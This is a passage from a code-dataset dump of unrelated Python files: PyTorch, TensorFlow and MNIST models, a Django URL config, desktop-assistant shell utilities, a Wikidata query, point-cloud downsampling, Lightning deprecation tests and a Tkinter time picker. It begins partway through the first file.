self.encoder(seg)\n\t\tx = self.dilated_layer(x)\n\t\tx = self.bottle_neck(x)\n\t\tx = self.decoder(x)\n\t\t\n\t\t# x = torch.clamp(x, -1, 1)\n\n\t\t# x = x*(1-mask) + seg\n\t\t# assert x.size() == [bs, self.n_classes, h, w], [ img.size(), x.size() ]\n\t\t# try my probability map first\n\t\t# x = x.view(bs, self.n_classes, h, w)\n\t\t# x = F.softmax(x, 1)\n\t\t# x = x.view(bs, self.n_classes, h, w)\n\t\treturn x\n\n\n\tdef _init_weights(self):\n\t\tdef normal_init(m, mean, stddev, truncated=False):\n\t\t\t\"\"\"\n\t\t\tweight initializer: truncated normal and random normal.\n\t\t\t\"\"\"\n\t\t\t# m is a module whose weight/bias are parameters\n\t\t\tif truncated:\n\t\t\t\tm.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n\t\t\telse:\n\t\t\t\tm.weight.data.normal_(mean, stddev)\n\t\t\t\tm.bias.data.zero_()\n\t\tfor i in self.encoder:\n\t\t\tif \"Conv\" in i.__class__.__name__:\n\t\t\t\tnormal_init(i, 0, 0.01)\n\t\tfor i in self.decoder:\n\t\t\tif \"Conv\" in i.__class__.__name__:\n\t\t\t\tnormal_init(i, 0, 0.01)\n\n","sub_path":"src/models/encoder_decoder.py","file_name":"encoder_decoder.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"7392974","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.urls.conf import include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n# from django.views.generic import TemplateView\n\n\nurlpatterns = [\n    path('secure_admin/', admin.site.urls),\n    path('account/', include('accounts.urls')),\n    # path('sw.js', TemplateView.as_view(template_name='user/sw.js', content_type='application/x-javascript'), name='sw.js'), \n    path('', include('q_and_a.urls')),\n    path('blog/', include('blog.urls')),\n    path('profiles/', include('profiles.urls')),\n    path('froala_editor/',include('froala_editor.urls')),\n    path('community/', include('community.urls')),\n    path('tutorials/', include('tutorials.urls')),\n    path('admin/', include('admin_app.urls')),\n    
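# django-allauth supplies the login/registration routes mounted under accounts/ below.\n    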
path('accounts/', include('allauth.urls')),\n    path('challenges/', include('challenges.urls')),\n    path('chat/', include('chat.urls')),\n    # path('webpush/', include('webpush.urls')),\n\n    \n] + static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"secondproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"592664550","text":"import os\nimport re\nimport subprocess\nimport signal\nimport time\nimport random\n\nimport psutil\nfrom threading import Thread\n\nCOLORS = {\n    \"HEADER\": \"\\033[95m\",\n    \"OKBLUE\": \"\\033[94m\",\n    \"OKGREEN\": \"\\033[92m\",\n    \"WARNING\": \"\\033[93m\",\n    \"FAIL\": \"\\033[91m\",\n    \"BOLD\": \"\\033[1m\",\n    \"UNDERLINE\": \"\\033[4m\",\n}\n\n\ndef chatbot_only(func):\n    def wrapper(text, interface, assistant):\n        if type(interface).__name__ == \"TelegramBot\":\n            func(text, interface, assistant)\n\n    return wrapper\n\n\ndef voice_only(func):\n    def wrapper(text, interface, assistant):\n        if type(interface).__name__ == \"VoiceInterface\":\n            func(text, interface, assistant)\n\n    return wrapper\n\n\ndef server_only(func):\n    def wrapper(text, interface, assistant):\n        if assistant.on_server:\n            func(text, interface, assistant)\n\n    return wrapper\n\n\ndef pc_only(func):\n    def wrapper(text, interface, assistant):\n        if not assistant.on_server:\n            func(text, interface, assistant)\n\n    return wrapper\n\n\ndef pick_phrase(phrases, me=\"\"):\n    return random.choice(phrases).replace(\"{me}\", me)\n\n\ndef os_is_raspbian():\n    return os.uname()[1] == \"raspberrypi\"\n\n\ndef get_my_ip(timeout=30):\n    start_time = time.time()\n    while time.time() - start_time <= timeout:\n        try:\n            with os.popen(\"ifconfig | grep 'inet 192'\") as process:\n                return re.findall(r\"192(?:\\.\\d{1,3}){3}\", process.read())[0]\n        except IndexError:\n            pass\n\n\ndef device_is_charging():\n    with os.popen(\n        \"upower -i /org/freedesktop/UPower/devices/battery_BAT0 | grep state\"\n    ) as process:\n        return bool(\n            re.findall(r\"fully-charged| charging|^(?![\\s\\S])\", process.read())\n        )\n\n\ndef device_has_battery():\n    with os.popen(\n        \"upower -i /org/freedesktop/UPower/devices/battery_BAT0 | grep power\"\n    ) as process:\n        return \"yes\" in process.read()\n\n\ndef colored(text, color=\"WARNING\", frame=True):\n    if frame:\n        x = \"_\" * len(text) + \"\\n\"\n        b = \" \" * len(text) + \"\\n\"\n        return (\n            COLORS[\"BOLD\"] + COLORS[color] + x + b + text + b + x + \"\\033[0m\"\n        )\n    else:\n        return COLORS[\"BOLD\"] + COLORS[color] + text + \"\\033[0m\"\n\n\ndef thread(targets, wait_to_finish=False):\n    for target in targets:\n        thr = Thread(target=target)\n        thr.start()\n        if wait_to_finish is True:\n            thr.join()\n\n\ndef screen_is_locked():\n    with os.popen(\"loginctl show-user | grep IdleHint\") as process:\n        if \"yes\" in process.read():\n            return True\n        else:\n            return False\n\n\ndef turn_screen_off():\n    os.system(\"sleep 0.01 && xset -display :0.0 dpms force off\")\n\n\ndef set_output_as_headphones():\n    os.system(\n        'pacmd set-default-sink \"alsa_output.pci-0000_00_1f.3.analog-stereo\"'\n    )\n\n\ndef get_volume():\n    with os.popen(\"amixer -D pulse\") as response:\n        volume = re.findall(r\"Playback.+\\[(\\d{1,3})%\\]\", response.read())[0]\n    return int(volume)\n\n\ndef kill_process(process):\n    p = subprocess.Popen([\"ps\", \"-A\"], stdout=subprocess.PIPE)\n    out, err = p.communicate()\n    for line in 
out.splitlines():\n        if process in line.decode(\"utf-8\"):\n            pid = int(line.split(None, 1)[0])\n            os.kill(pid, signal.SIGKILL)\n\n\ndef notification(\n    message,\n    title=\" \",\n    time=1000,\n    icon=\"~/Dropbox/Jarvis/.icons/J.png\",\n    urgency=\"normal\",\n):\n    command = 'notify-send \"{}\" \"{}\" -t {} -i {} -u {}'.format(\n        title, message, time, icon, urgency\n    )  # low, critical\n    os.system(command)\n\n\ndef is_running(process_name):\n    return process_name in (p.name() for p in psutil.process_iter())\n","sub_path":"assistant/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"163425104","text":"\n#%%\nimport sys\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nimport pandas as pd\n\nendpoint_url = \"https://query.wikidata.org/sparql\"\nuser_agent = \"WDQS-example Python/%s.%s\" % (sys.version_info[0], sys.version_info[1])\nsparql = SPARQLWrapper(endpoint_url,agent=user_agent)\nsparql.setReturnFormat(JSON)\n#%%\nquery = \"\"\"\nSELECT DISTINCT ?country ?countryLabel ?language ?languageLabel ?ISO ?countryISO\nWHERE\n{\n  ?country wdt:P37 ?language;\n           wdt:P298 ?countryISO.\n  ?language wdt:P220 ?ISO.\n  ?country rdfs:label ?countryLabel . FILTER(lang(?countryLabel)='en')\n  ?language rdfs:label ?languageLabel . FILTER(lang(?languageLabel)='en')\n  SERVICE wikibase:label { bd:serviceParam wikibase:language \"[AUTO_LANGUAGE]\". }\n}\nORDER BY ?country\n\"\"\"\n#%%\nsparql.setQuery(query)\nresults = sparql.query().convert()\ndf = pd.json_normalize(results[\"results\"][\"bindings\"])\ndf = df[[col for col in df.columns if 'value' in col]]\ndf = df.rename(columns = lambda col: col.replace(\".value\", \"\"))\n#df.to_csv('query_final.csv')\n# %%","sub_path":"df_principal/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"146753267","text":"# Type \"tensorboard --logdir=logs\" in the terminal to view the logs\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = '2'\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Helper that adds one fully connected layer\ndef add_layer(inputs, in_size, out_size, n_layer, activation_function = None):\n    layer_name = 'layer%s' % n_layer\n    with tf.name_scope(layer_name):\n        with tf.name_scope('weights'):\n            Weights = tf.Variable(tf.random.normal([in_size, out_size]), name='W')\n            tf.compat.v1.summary.histogram(layer_name+'/weights', Weights)\n        with tf.name_scope('biases'):\n            biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n            tf.compat.v1.summary.histogram(layer_name+'/biases', biases)\n        with tf.name_scope('Wx_plus_b'):\n            Wx_plus_b = tf.matmul(inputs, Weights) + biases\n\n        if activation_function is None:\n            outputs = Wx_plus_b\n        else:\n            outputs = activation_function(Wx_plus_b)\n        tf.compat.v1.summary.histogram(layer_name+'/outputs', outputs)\n\n        return outputs\n\n# Generate training data\nx_data = np.linspace(-1, 1, 300)[:, np.newaxis]  # -1 to 1 , 300 examples\nnoise = np.random.normal(0, 0.05, x_data.shape)\ny_data = np.square(x_data) - 0.5 + noise\n\n# Define the input placeholders, grouped under \"input\" in TensorBoard\nwith tf.name_scope('input'):\n    xs = tf.compat.v1.placeholder(tf.float32, [None, 1], name='x_input')\n    ys = tf.compat.v1.placeholder(tf.float32, [None, 1], name='y_input')\n\n# Build a network with one hidden layer\nl1 = add_layer(xs, 1, 10, n_layer=1, activation_function=tf.nn.relu)\nprediction = add_layer(l1, 10, 1, n_layer=2, activation_function=None)\n\n# Define the loss and the optimizer\nwith tf.name_scope('loss'):\n    
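# The tf.compat.v1.summary.scalar call just below exposes this loss curve in TensorBoard.\n    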
loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction), reduction_indices = [1]))  # sum squared error per row, then average over the batch\n    tf.compat.v1.summary.scalar('loss', loss)\nwith tf.name_scope('train'):\n    train_step = tf.compat.v1.train.GradientDescentOptimizer(0.1).minimize(loss)\n\n# Initialize all variables\ninit = tf.compat.v1.global_variables_initializer()\n\n# Create the session\nsess = tf.compat.v1.Session()\nmerged = tf.compat.v1.summary.merge_all()  # merge all summaries\nwriter = tf.compat.v1.summary.FileWriter(\"logs/\", sess.graph)  # write the TensorBoard log\nsess.run(init)\n\n# Set up the figure\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\nax.scatter(x_data, y_data)  # plot the real data\nplt.ion()  # interactive mode, so the figure keeps updating\n\n# Training loop\nfor i in range(1000):\n    sess.run(train_step, feed_dict={xs: x_data, ys: y_data})\n    if i % 50 == 0:\n        result = sess.run(merged, feed_dict={xs: x_data, ys: y_data})\n        writer.add_summary(result, i)\n        print(sess.run(loss, feed_dict={xs: x_data, ys: y_data}))\n\n        # remove the previously drawn fitted line if there is one, otherwise skip\n        try:\n            ax.lines.remove(lines[0])\n        except Exception:\n            pass\n\n        # draw the new fitted line\n        prediction_value = sess.run(prediction, feed_dict={xs: x_data})\n        lines = ax.plot(x_data, prediction_value, 'r-', lw=5)\n\n        # pause so the plot can redraw\n        plt.pause(0.1)\n\n# Keep the final figure open\nplt.show()\nplt.pause(0)","sub_path":"exp5_addNNLayer.py","file_name":"exp5_addNNLayer.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"251840584","text":"import open3d\nimport os\nimport numpy as np\nfrom util.point_cloud_util import load_labels, write_labels\nfrom dataset.semantic_dataset import all_file_prefixes\n\n\ndef down_sample(\n    dense_pcd_path, dense_label_path, sparse_pcd_path, sparse_label_path, processed_pcd_path, processed_label_path, voxel_size\n):\n    # Skip if done\n    if os.path.isfile(sparse_pcd_path) and (\n        not os.path.isfile(dense_label_path) or os.path.isfile(sparse_label_path)\n    ):\n        print(\"Skipped:\", file_prefix)\n        return\n    else:\n        print(\"Processing:\", file_prefix)\n\n    # Inputs\n    dense_pcd = open3d.read_point_cloud(dense_pcd_path)\n    try:\n        dense_labels = load_labels(dense_label_path)\n    except Exception:\n        dense_labels = None\n\n    # Skip label 0, we use explicit frees to reduce memory usage\n    print(\"Num points:\", np.asarray(dense_pcd.points).shape[0])\n    if dense_labels is not None:\n        non_zero_indexes = dense_labels != 0\n\n        dense_points = np.asarray(dense_pcd.points)[non_zero_indexes]\n        dense_pcd.points = open3d.Vector3dVector()\n        dense_pcd.points = open3d.Vector3dVector(dense_points)\n        #\n        #xyz = dense_points.copy()\n        #print(xyz.shape)\n        del dense_points\n\n        dense_colors = np.asarray(dense_pcd.colors)[non_zero_indexes]\n        dense_pcd.colors = open3d.Vector3dVector()\n        dense_pcd.colors = open3d.Vector3dVector(dense_colors)\n        #\n        #i = (dense_colors[:,0]).reshape(-1,1)\n        #print(i.shape)\n        del dense_colors\n\n        #\n        #dense_labels = dense_labels[non_zero_indexes]\n        #data = np.concatenate((xyz, i), axis=1)\n        #print(data.shape, dense_labels.shape)\n        #np.savez(processed_label_path, dense_labels)\n        #np.savez(processed_pcd_path, data)\n        #del xyz, i, data\n\n    print(\"Num points after 0-skip:\", np.asarray(dense_pcd.points).shape[0])\n\n    # Downsample points\n    min_bound = dense_pcd.get_min_bound() - voxel_size * 0.5\n    max_bound = dense_pcd.get_max_bound() + voxel_size * 0.5\n\n    sparse_pcd, cubics_ids = open3d.voxel_down_sample_and_trace(\n        dense_pcd, voxel_size, min_bound, max_bound, False\n    )\n    print(\"Num points after down sampling:\", np.asarray(sparse_pcd.points).shape[0])\n\n    open3d.write_point_cloud(sparse_pcd_path, sparse_pcd)\n    
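# After saving, the block below reloads the sparse cloud and packs xyz plus a log-scaled intensity channel into an .npz for training.\n    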
print(\"Point cloud written to:\", sparse_pcd_path)\n########################\n sparse_pcd_npz = open3d.read_point_cloud(sparse_pcd_path)\n xyz = np.asarray(sparse_pcd_npz.points)\n \n i = np.asarray(sparse_pcd_npz.colors)\n #print('All Values:',i[:,:10])\n #print(i.min(), i.max())\n i = (i[:,0]).reshape(-1,1)\n #print('Intensity(1):',i[:10])\n i *=255\n #print('Intensity(255):',i[:10])\n i = (20*i - 2500)/10\n #print('Intensity(Ori):',i[:10])\n i = 10**(i/200)\n #print('Intensity(log):',i[:10])\n print(i.min(), i.max())\n #i = (i*255)-127\n #print(xyz.shape)\n #print(i.shape)\n data = np.concatenate((xyz, i), axis=1)\n print(data.shape)\n np.savez(processed_pcd_path, data)\n\n # Downsample labels\n if dense_labels is not None:\n sparse_labels = []\n for cubic_ids in cubics_ids:\n cubic_ids = cubic_ids[cubic_ids != -1]\n cubic_labels = dense_labels[cubic_ids]\n sparse_labels.append(np.bincount(cubic_labels).argmax())\n \n write_labels(sparse_label_path, sparse_labels)\n print(\"Labels written to:\", sparse_label_path)\n sparse_labels = np.array(sparse_labels)\n print(\"Labels:\", sparse_labels.shape)\n np.savez(processed_label_path, sparse_labels)\n\n\n\n \nif __name__ == \"__main__\":\n voxel_size = 0.05\n\n # By default\n # raw data: \"dataset/semantic_raw\"\n # downsampled data: \"dataset/semantic_downsampled\"\n current_dir = os.path.dirname(os.path.realpath(__file__))\n dataset_dir = os.path.join(current_dir, \"dataset\")\n raw_dir = os.path.join(dataset_dir, \"intense_log\")\n downsampled_dir = os.path.join(dataset_dir, \"semantic_downsampled/xyzi_log\") #test\n #processed_dir = os.path.join(dataset_dir, \"semantic_downsampled/trial\") #processed\n\n # Create downsampled_dir\n os.makedirs(downsampled_dir, exist_ok=True)\n #os.makedirs(processed_dir, exist_ok=True)\n\n for file_prefix in all_file_prefixes:\n # Paths\n dense_pcd_path = os.path.join(raw_dir, file_prefix + \".pcd\")\n dense_label_path = os.path.join(raw_dir, file_prefix + \".labels\")\n sparse_pcd_path = os.path.join(downsampled_dir, file_prefix + \".pcd\")\n sparse_label_path = os.path.join(downsampled_dir, file_prefix + \".labels\")\n processed_pcd_path = os.path.join(downsampled_dir, file_prefix + \"_vertices.npz\")\n processed_label_path = os.path.join(downsampled_dir, file_prefix + \"_labels.npz\")\n\n # Put down_sample in a function for garbage collection\n down_sample(\n dense_pcd_path,\n dense_label_path,\n sparse_pcd_path,\n sparse_label_path,\n processed_pcd_path,\n processed_label_path,\n voxel_size,\n )\n","sub_path":"downsample.py","file_name":"downsample.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"581046512","text":"# Copyright The PyTorch Lightning team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Test deprecated functionality which will be removed in v1.6.0.\"\"\"\nfrom unittest.mock import call, Mock\n\nimport pytest\n\nfrom pytorch_lightning import Trainer\nfrom 
pytorch_lightning.utilities.model_helpers import is_overridden\nfrom pytorch_lightning.utilities.model_summary import ModelSummary\nfrom tests.helpers import BoringModel\n\n\ndef test_old_transfer_batch_to_device_hook(tmpdir):\n class OldModel(BoringModel):\n def transfer_batch_to_device(self, batch, device):\n return super().transfer_batch_to_device(batch, device, None)\n\n trainer = Trainer(default_root_dir=tmpdir, limit_train_batches=1, limit_val_batches=0, max_epochs=1)\n with pytest.deprecated_call(match=\"old signature will be removed in v1.6\"):\n trainer.fit(OldModel())\n\n\ndef test_v1_6_0_reload_dataloaders_every_epoch(tmpdir):\n model = BoringModel()\n\n tracker = Mock()\n model.train_dataloader = Mock(wraps=model.train_dataloader)\n model.val_dataloader = Mock(wraps=model.val_dataloader)\n model.test_dataloader = Mock(wraps=model.test_dataloader)\n\n tracker.attach_mock(model.train_dataloader, \"train_dataloader\")\n tracker.attach_mock(model.val_dataloader, \"val_dataloader\")\n tracker.attach_mock(model.test_dataloader, \"test_dataloader\")\n\n with pytest.deprecated_call(match=\"`reload_dataloaders_every_epoch` is deprecated in v1.4 and will be removed\"):\n trainer = Trainer(\n default_root_dir=tmpdir,\n limit_train_batches=0.3,\n limit_val_batches=0.3,\n reload_dataloaders_every_epoch=True,\n max_epochs=3,\n )\n trainer.fit(model)\n trainer.test()\n\n expected_sequence = (\n [call.val_dataloader()] + [call.train_dataloader(), call.val_dataloader()] * 3 + [call.test_dataloader()]\n )\n assert tracker.mock_calls == expected_sequence\n\n\ndef test_v1_6_0_is_overridden_model():\n model = BoringModel()\n with pytest.deprecated_call(match=\"and will be removed in v1.6\"):\n assert is_overridden(\"validation_step\", model=model)\n with pytest.deprecated_call(match=\"and will be removed in v1.6\"):\n assert not is_overridden(\"foo\", model=model)\n\n\ndef test_v1_6_0_train_loop(tmpdir):\n trainer = Trainer()\n with pytest.deprecated_call(\n match=r\"`Trainer.train_loop` has been renamed to `Trainer.fit_loop` and will be removed in v1.6.\"\n ):\n _ = trainer.train_loop\n\n\ndef test_v1_6_0_deprecated_model_summary_mode(tmpdir):\n model = BoringModel()\n with pytest.deprecated_call(match=\"Argument `mode` in `ModelSummary` is deprecated in v1.4\"):\n ModelSummary(model, mode=\"top\")\n\n with pytest.deprecated_call(match=\"Argument `mode` in `LightningModule.summarize` is deprecated in v1.4\"):\n model.summarize(mode=\"top\")\n\n\ndef test_v1_6_0_deprecated_disable_validation():\n trainer = Trainer()\n with pytest.deprecated_call(match=\"disable_validation` is deprecated in v1.4\"):\n _ = trainer.disable_validation\n\n\ndef test_v1_6_0_deprecated_hpc_load(tmpdir):\n model = BoringModel()\n trainer = Trainer(default_root_dir=tmpdir, max_steps=1)\n trainer.fit(model)\n trainer.checkpoint_connector.hpc_save(tmpdir, trainer.logger)\n checkpoint_path = trainer.checkpoint_connector.get_max_ckpt_path_from_folder(str(tmpdir))\n with pytest.deprecated_call(match=r\"`CheckpointConnector.hpc_load\\(\\)` was deprecated in v1.4\"):\n trainer.checkpoint_connector.hpc_load(checkpoint_path)\n","sub_path":"tests/deprecated_api/test_remove_1-6.py","file_name":"test_remove_1-6.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233320157","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as 
plt\nmnist=input_data.read_data_sets(\"data_set\",one_hot=True)\nX=tf.placeholder(tf.float32,[None,784])\nY=tf.placeholder(tf.float32,[None,10])\n# initialize the weights\ndef init_weight(shape):\n return tf.Variable(tf.random_normal(shape,stddev=0.01))\n# build the network\nw=init_weight([3,3,1,32])\nw2=init_weight([3,3,32,64])\nw3=init_weight([3,3,64,128])\nw4=init_weight([128*4*4,625])\nw_o=init_weight([625,10])\n# X: input data\n# w: weights of each layer\n# p_keep_conv, p_keep_hidden: fraction of neurons kept by dropout\ndef model(X,w,w2,w3,w4,w_o,p_keep_conv,p_keep_hidden):\n # first convolution and pooling layer\n X=tf.reshape(X,shape=[-1,28,28,1])\n l1a=tf.nn.relu(tf.nn.conv2d(X,w,strides=[1,1,1,1],padding=\"SAME\"))\n l1=tf.nn.max_pool(l1a,ksize=[1,2,2,1],strides=[1,2,2,1],padding=\"SAME\")\n l1=tf.nn.dropout(l1,p_keep_conv)\n # second convolution and pooling layer\n l2a=tf.nn.relu(tf.nn.conv2d(l1,w2,strides=[1,1,1,1],padding=\"SAME\"))\n l2=tf.nn.max_pool(l2a,ksize=[1,2,2,1],strides=[1,2,2,1],padding=\"SAME\")\n l2=tf.nn.dropout(l2,p_keep_conv)\n # third convolution and pooling layer\n l3a = tf.nn.relu(tf.nn.conv2d(l2, w3, strides=[1, 1, 1, 1], padding=\"SAME\"))\n l3 = tf.nn.max_pool(l3a, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n l3 = tf.reshape(l3, [-1, w4.get_shape().as_list()[0]])\n l3 = tf.nn.dropout(l3, p_keep_conv)\n # fully connected layer\n l4=tf.nn.relu(tf.matmul(l3,w4))\n l4=tf.nn.dropout(l4,p_keep_hidden)\n # output layer\n pyx=tf.matmul(l4,w_o)\n return pyx\n\np_keep_conv =tf.placeholder(\"float\")\np_keep_hidden = tf.placeholder(\"float\")\npy_x=model(X,w,w2,w3,w4,w_o,p_keep_conv,p_keep_hidden)\n# cost\ncost=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=py_x,labels=Y))\ntrain_step=tf.train.AdamOptimizer(0.001).minimize(cost)\npred=tf.argmax(py_x,1)\n# training\nbatch_size=128\ntest_size=128\nwith tf.Session() as sess:\n tf.global_variables_initializer().run()\n xx = []\n l = []\n for i in range(5000):\n batch_train_x,batch_train_y=mnist.train.next_batch(batch_size)\n sess.run(train_step,feed_dict={X:batch_train_x,Y:batch_train_y,\n p_keep_conv:0.8,p_keep_hidden:0.6})\n batch_test_x, batch_test_y = mnist.test.next_batch(batch_size)\n accuracy=np.mean(np.argmax(batch_test_y,1)==\n sess.run(pred,feed_dict={X:batch_test_x,Y:batch_test_y,\n p_keep_conv:1,p_keep_hidden:1}))\n xx.append(accuracy)\n l.append(i)\n print(\"loss:\",sess.run(cost, feed_dict={X: batch_train_x, Y: batch_train_y,\n p_keep_conv: 0.8, p_keep_hidden: 0.6}))\n print(\"test accuracy:\",accuracy)\n\n batch_test_x= mnist.test.images\n batch_test_y= mnist.test.labels\n accuracy = np.mean(np.argmax(batch_test_y, 1) ==\n sess.run(pred, feed_dict={X: batch_test_x, Y: batch_test_y,\n p_keep_conv: 1, p_keep_hidden: 1}))\n print(\"final accuracy:\",accuracy)\n plt.plot(l, xx)\n plt.show()\n","sub_path":"mnist_cnn/mnist_cnn.py","file_name":"mnist_cnn.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"551048806","text":"from enum import Enum\nfrom datetime import datetime\nfrom tkinter import E, Frame, N, S, W\n\nfrom utils.config import ConfigValues\nfrom utils.flatButton import FlatButton\n\nfrom utils.internationalization import Internationalization\n\n\nclass SetTimeCallback(Enum):\n CLOSE = 0\n SET_TIME = 1\n\nclass SetTimeView(Frame):\n\n
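# --- Illustrative sketch (added; not in the original file) ---\n # SetTimeView keeps the clock as four digits [H, h, M, m]; makeValid() below\n # clamps each digit when + or - is pressed. For the two minute digits this is\n # equivalent to modular arithmetic (assumption: same wrap-around behaviour):\n def _wrap_minute_digit(self, index, change): # hypothetical helper, not wired up\n base = 6 if index == 2 else 10 # tens of minutes 0..5, ones 0..9\n return (self.time[index] + change) % base\n\n # bound (Bool): Are the two variables linked? 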
(Can variable 2 be less than variable 1)\n def __init__(self, callback, parent=None):\n self.config = ConfigValues()\n Frame.__init__(self, parent, bg=self.config.values['colors']['darkBlue'])\n\n self.callback = callback\n now = datetime.now()\n dt = now.strftime(\"%H%M\")\n self.time = [int(dt[0]), int(dt[1]), int(dt[2]), int(dt[3])]\n\n Internationalization()\n\n self.fill_frame()\n\n def getTime(self):\n return str(self.time[0]) + str(self.time[1]) + \":\" + str(self.time[2]) + str(self.time[3])\n\n def returnTimeCallback(self, ttype):\n self.callback(ttype, self.getTime())\n\n def makeValid(self, time, index, change):\n if index == 0:\n time[0] += change\n if time[0] == -1 or time[0] == 3:\n time[0] += (-1*change*3)\n if time[0] == 2 and time[1] > 3:\n time[1] = 3\n\n if index == 1:\n time[1] += change\n if time[0] == 2 and time[1] == 4:\n time[1] = 0\n elif time[1] == -1:\n if time[0] == 2:\n time[1] = 3\n else:\n time[1] = 9\n elif time[1] > 9:\n time[1] = 0\n \n if index == 2:\n time[2] += change\n if time[2] in [-1, 6]:\n time[2] += (-1*change*6)\n \n if index == 3:\n time[3] += change\n if time[3] in [-1, 10]:\n time[3] += (-1*change*10)\n \n\n return time\n\n def update(self):\n self.first_digit.setText(self.time[0])\n self.second_digit.setText(self.time[1])\n self.third_digit.setText(self.time[2])\n self.fourth_digit.setText(self.time[3])\n\n def changeTimeCallback(self, arg):\n (index, change) = arg\n newtime = self.time[:]\n \n self.time = self.makeValid(newtime, index, change)\n\n self.update()\n\n def drawPlusButtons(self):\n first_plus = FlatButton(self, self.changeTimeCallback, (0, 1), self.config.values['colors']['lightBlue'], fontSize=40)\n first_plus.setText(\"+\")\n first_plus.grid(row=1, column=0, sticky=N+S+E+W, padx=10, pady=10)\n\n second_plus = FlatButton(self, self.changeTimeCallback, (1, 1), self.config.values['colors']['lightBlue'], fontSize=40)\n second_plus.setText(\"+\")\n second_plus.grid(row=1, column=1, sticky=N+S+E+W, padx=10, pady=10)\n\n third_plus = FlatButton(self, self.changeTimeCallback, (2, 1), self.config.values['colors']['lightBlue'], fontSize=40)\n third_plus.setText(\"+\")\n third_plus.grid(row=1, column=3, sticky=N+S+E+W, padx=10, pady=10)\n\n fourth_plus = FlatButton(self, self.changeTimeCallback, (3, 1), self.config.values['colors']['lightBlue'], fontSize=40)\n fourth_plus.setText(\"+\")\n fourth_plus.grid(row=1, column=4, sticky=N+S+E+W, padx=10, pady=10)\n\n def drawTime(self):\n self.first_digit = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=40)\n self.first_digit.grid(row=2, column=0, sticky=N+S+E+W, padx=10, pady=10)\n\n self.second_digit = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=40)\n self.second_digit.grid(row=2, column=1, sticky=N + S + E + W, padx=10, pady=10)\n\n dots = FlatButton(self, self.changeTimeCallback, (1, 1), self.config.values['colors']['darkBlue'],\n fontSize=40)\n dots.setText(\":\")\n dots.grid(row=2, column=2, sticky=N + S + E + W, padx=10, pady=10)\n\n self.third_digit = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=40)\n self.third_digit.grid(row=2, column=3, sticky=N + S + E + W, padx=10, pady=10)\n\n self.fourth_digit = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=40)\n self.fourth_digit.grid(row=2, column=4, sticky=N + S + E + W, padx=10, pady=10)\n\n self.update()\n\n def drawMinusButtons(self):\n first_miuns = FlatButton(self, self.changeTimeCallback, (0, -1), 
self.config.values['colors']['lightBlue'], fontSize=40)\n first_miuns.setText(\"-\")\n first_miuns.grid(row=3, column=0, sticky=N+S+E+W, padx=10, pady=10)\n\n second_miuns = FlatButton(self, self.changeTimeCallback, (1, -1), self.config.values['colors']['lightBlue'], fontSize=40)\n second_miuns.setText(\"-\")\n second_miuns.grid(row=3, column=1, sticky=N+S+E+W, padx=10, pady=10)\n\n third_miuns = FlatButton(self, self.changeTimeCallback, (2, -1), self.config.values['colors']['lightBlue'], fontSize=40)\n third_miuns.setText(\"-\")\n third_miuns.grid(row=3, column=3, sticky=N+S+E+W, padx=10, pady=10)\n\n fourth_miuns = FlatButton(self, self.changeTimeCallback, (3, -1), self.config.values['colors']['lightBlue'], fontSize=40)\n fourth_miuns.setText(\"-\")\n fourth_miuns.grid(row=3, column=4, sticky=N+S+E+W, padx=10, pady=10)\n\n\n def fill_frame(self):\n label_btn = FlatButton(self, None, None, self.config.values['colors']['darkBlue'], fontSize=25)\n label_btn.setText(_(\"Set the Time\"))\n label_btn.grid(row=0, column=0, columnspan=5, sticky=N+S+E+W, padx=10, pady=10)\n\n self.drawPlusButtons()\n self.drawTime()\n self.drawMinusButtons()\n\n confirm_btn = FlatButton(self, self.returnTimeCallback, SetTimeCallback.SET_TIME, self.config.values['colors']['green'], fontSize=40)\n confirm_btn.setText(_(\"Confirm\"), \"white\")\n confirm_btn.grid(row=4, column=0, 